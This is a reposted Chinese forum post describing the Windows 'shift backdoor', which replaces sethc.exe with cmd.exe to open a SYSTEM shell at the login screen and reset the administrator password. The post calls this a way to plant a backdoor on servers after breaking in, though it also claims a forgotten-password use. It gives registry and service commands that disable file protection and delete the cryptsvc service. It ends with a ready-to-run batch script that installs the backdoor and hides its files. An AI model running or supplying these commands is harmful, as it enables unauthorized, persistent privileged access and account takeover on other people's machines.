新技术论坛
搜索
查看: 1017|回复: 0
打印 上一主题 下一主题

(转载)sethc替换法启动cmd

[复制链接]
  • TA的每日心情
    郁闷
    2016-4-15 18:50
  • 签到天数: 19 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    扫一扫,手机访问本帖
    楼主
    跳转到指定楼层
    发表于 2016-3-18 20:41:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    sethc替换法启动cmd

    ethc.exe就是win系统里自带的鸡肋功能,所谓的粘滞键, 可以用来在入侵别人服务器后给服务器上装后门用.

          用COPY命令将cmd.exe复制为sethc.exe,这样在登陆界面是连按五下左SHIFT就可以调出我们可爱的CMD命令窗口SHELL(系统权限)了!----------------------copy cmd.exe sethc.exe
        最后重启后进入登陆介面...现在我们连续按五下左SHIFT..出现了个cmd命令窗口,它是shell(系统权限)....
    使用DOS命令:net user administrator 123456 就可以把管理员密码改成:123456了..试下使用123456就可以登陆了!..
    比如也可以利用CMD替换掉logon.scr等待屏保获得CMDSHELL也是很好的方法!

    命令:copy c:\windows\system32\CMD.exe c:\windows\system32\sethc.exe

    什么是shift后门?简单说就是给电脑加一个后门,如果电脑设置了开机密码,在开机进入windows登陆界面的时候,如果我们连续按5次shift键,会打开电脑的一个正常程序,如果我们把这个程序替换成木马或者cmd等我们就可以来利用了。
    那么具体有什么应用呢?我们不是用这个来做坏事的,举个简单的例子:我们之前把sethc.exe替换成cmd.exe,如果我们的电脑设置了开机密码,有一天我们把这个密码忘记了,那么怎么办?就可以利用这个shift后门,按5次就可以调出cmd窗口,利用这个把我们的账户重新改一下密码,用这个新密码就可以登陆系统了。
    本文介绍这个shift后门目的就是为了这个,那么我们替换sethc.exe失败的时候怎么办?
    某些机器开启文件保护服务可能会导致覆盖失败
    解决方法:
    方法一:
    修改注册表
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t reg_doword /d ffffff9d /f
    方法二:
    停止服务
    net stop cryptsvc
    sc config cryptsvc start= disabled
    sc delete cryptsvc
    方法三:
    同时覆盖高速缓存目录文件
    copy c:\sethc.exe c:\windows\system32\sethc.exe
    copy c:\sethc.exe c:\windows\system32\dllcache\sethc.exe
    以上方法基本可以解决问题。
    附上一个简单的shift后门,把以下代码粘贴到记事本里,把记事本重命名为1.bat格式的,运行就可以。


    @echo off
    cls
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo.
    echo Shift
    echo.
    echo 使用方法:本文件执行完毕后,
    echo 在终端界面按Shift 5次即可登陆系统!
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo.
    copy e:\windows\explorer.exe e:\windows\system32\sethc.exe
    echo 完成百分之 50
    copy e:\windows\system32\sethc.exe e:\windows\system32\dllcache\sethc.exe
    echo 完成百分之 80
    attrib e:\windows\system32\sethc.exe +h
    echo 完成百分之 90
    attrib e:\windows\system32\dllcache\sethc.exe +h
    echo 完成百分之 100
    cls
    echo.
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo 后门安装完毕!
    echo.
    echo 感谢您使用Shift后门
    echo.
    echo
    echo.
    echo
    echo.
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    echo.
    echo. & pause
    exit


    高级模式
    B Color Image Link Quote Code Smilies

    本版积分规则

    手机版|Archiver|开发者俱乐部 ( ICP/ISP证:辽B-2-4-20110106号 IDC证:辽B-1-2-20070003号 )

    GMT+8, 2024-12-23 20:12 , Processed in 0.114569 second(s), 18 queries .

    X+ Open Developer Network (xodn.com)

    © 2009-2017 沈阳讯网网络科技有限公司

    快速回复 返回顶部 返回列表